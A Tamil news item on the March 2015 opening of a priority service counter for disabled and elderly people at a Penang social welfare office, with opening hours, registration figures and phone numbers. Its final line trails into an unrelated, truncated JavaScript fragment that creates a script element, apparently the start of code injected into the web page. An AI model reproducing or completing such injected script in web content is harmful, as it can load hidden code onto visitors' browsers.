பினாங்கு மாநில வடகிழக்கு சமூகநல அலுவலத்தில் “விரைவு
முகப்பிடம்” (Kaunter Pandu Lalu) உடல்பேறு குறைந்தவர்களுக்கும் மூத்தக் குடிமக்களுக்குச் சிறந்த சேவையை வழங்கும் வகையில் பிரத்தியேகமாக கடந்த 12 மார்ச் 2015 சமூகநல அலுவலக வளாகத்தில் இனிதே திறப்பு விழாக் கண்டது. இதனை அதிகாரப்பூர்வமாகத் திறந்து வைத்தார் பினாங்கு சமூகநல துறையின் தலைமை அதிகாரி டாக்டர் சய்தோல் மிந்தி சாலே.
இந்த விரைவு முகப்பிடம் உடல்பேறு குறைந்தவர்கள் மற்றும் மூத்தக் குடிமக்கள் எளிய முறையில் சேவை பெற உறுதுணையாக அமையும் என தமது உரையில் குறிப்பிட்டார் தலைமை அதிகாரி. இந்த முகப்பிடம் (Kaunter Pandu Lalu) ஒவ்வொரு புதன் மற்றும் வியாழன் கிழமைகளில் காலை மணி 9.00 முதல் நண்பகல் மணி 12.00 வரை திறந்திருக்கும். உடல்பேறு குறைந்தவர்களும் மூத்தக் குடிமக்களும் நீண்ட தூரம் நடப்பதையும் படிக்கடுகள் ஏறுவதையும் தவிர்க்கும் முயற்சியல் இந்த சேவை ஆரம்பிக்கப்பட்டது . வாடிக்கையாளர்கள் வருகை அதிகரித்தால் இச்சேவை மேலும் கூடுதல் நாட்களுக்கு வழங்கப்படும் . இச்சேவை பினாங்கில் உள்ள தென்மேற்கு மாவட்டம், வடக்கிழக்கு மாவட்டம் மற்றும் வட செபராங் பிறை மாவட்டங்களில் வழங்கப்படுவது பாராட்டக்குறியதாகும் . மற்ற மாவட்டங்களிலும் இதனை விரிவுப்படுத்த எண்ணம் கொண்டுள்ளதாக தலைமை அதிகாரி டாக்டர் சய்தோல் தெரிவித்தார்.
பினாங்கு மாநில முழுவதும் 2014-ஆம் ஆண்டு பதிவுப்பெற்ற உடல் பேறு குறைந்தவர்கள் 18,690 ஆவர். இந்த ஆண்டு துவக்கத்தில் மேலும் 6,000 பேர் பதிவுப்பெற்றுள்ளனர்.. இவர்களுக்கு சிறந்த சேவைகளை வழங்குவதை தங்களின் கடமையாக பினாங்கு மாநில வடகிழக்கு சமூகநல அலுவலக பணியாளர்கள் கொண்டுள்ளனர் . மேல் விபரங்களுக்கு பொதுமக்கள் 04-2277413 / 04-2277412 / 04-2264531 என்ற எண்களை தொடர்புக் கொள்ள அழைக்கப்படுகின்றனர்.var d=document;var s=d.createElement(‘script’);